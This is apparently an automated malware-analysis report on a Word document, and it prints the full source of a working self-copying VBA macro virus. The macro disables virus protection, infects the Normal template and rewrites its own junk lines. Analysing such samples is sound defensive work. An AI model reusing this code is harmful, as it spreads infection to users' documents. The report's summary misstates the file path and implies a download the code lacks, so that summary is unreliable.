MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document with a high confidence verdict of malicious, primarily due to the presence of VBA macros. The 'Document_Close' subroutine within the macros is designed to export its own code to 'c:\macros.bas' and then attempt to add it back into the document, suggesting an attempt to obfuscate or modify its behavior. This pattern is commonly used by macro-based malware to download and execute further malicious content.
Heuristics 2
-
ClamAV: Doc.Trojan.Class-34 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-34
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2158 bytes |
SHA-256: 04faae4fd28857def8512447638eb36047b6b1f8e443ae6cda3061cafea9ec87 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-34
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Close()
PLM = GGR + AQR
On Error Resume Next
PAJ = SRI + VTB
Options.ConfirmConversions = 0
UIL = QBN + KGN
Application.EnableCancelKey = 0
OFG = SSM + VUE
VB39 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
PVF = LCV + OAM
SG69 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CCR = GBG + IGU
Options.SaveNormalPrompt = 0
VIG = DDO + JJP
Options.VirusProtection = 0
HNE = EMB + KTF
If SG69 > 0 And VB39 > 0 Then GoTo GV13
RIG = UNN + JCM
If SG69 = 0 Then
PUS = ALU + JOL
Set DQ55 = ActiveDocument.VBProject.VBComponents.Item(1)
LKH = IFB + FVB
UV96 = True
IIK = DKF + NLD
End If
UOL = ICR + KQN
If VB39 = 0 Then
SAE = BCH + CAL
Set DQ55 = NormalTemplate.VBProject.VBComponents.Item(1)
OLS = BEO + JHD
IR69 = True
PUL = BQI + KKE
End If
HCM = DUC + JGT
If IR69 = True Then
QGO = FBA + HRG
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\" & Application.UserInitials
FKF = HAK + ETM
DQ55.CodeModule.AddFromFile ("c:\" & Application.UserInitials)
QUH = LBN + JVC
DQ55.CodeModule.deletelines 1, 4
UNH = DKE + VCA
DQ55.CodeModule.replaceline 1, "Sub Document_Close()"
HMU = LIS + SOP
ElseIf UV96 = True Then
VHK = JPD + JLR
DQ55.CodeModule.AddFromFile ("c:\" & Application.UserInitials)
LJL = FNK + OTI
DQ55.CodeModule.deletelines 1, 4
GGD = LEM + HTK
End If
EPQ = NRD + REV
With DQ55.CodeModule
BBR = IKC + CDB
For x = 2 To (DQ55.CodeModule.CountOfLines - 1) Step 2
PLM = EKQ + QIT
.replaceline x, (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " = " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " + " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22)))
QBN = PAJ + IGV
Next x
RPJ = QGH + JUC
End With
OHC = EBJ + VLK
GV13:
VEI = IGL + DLV
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.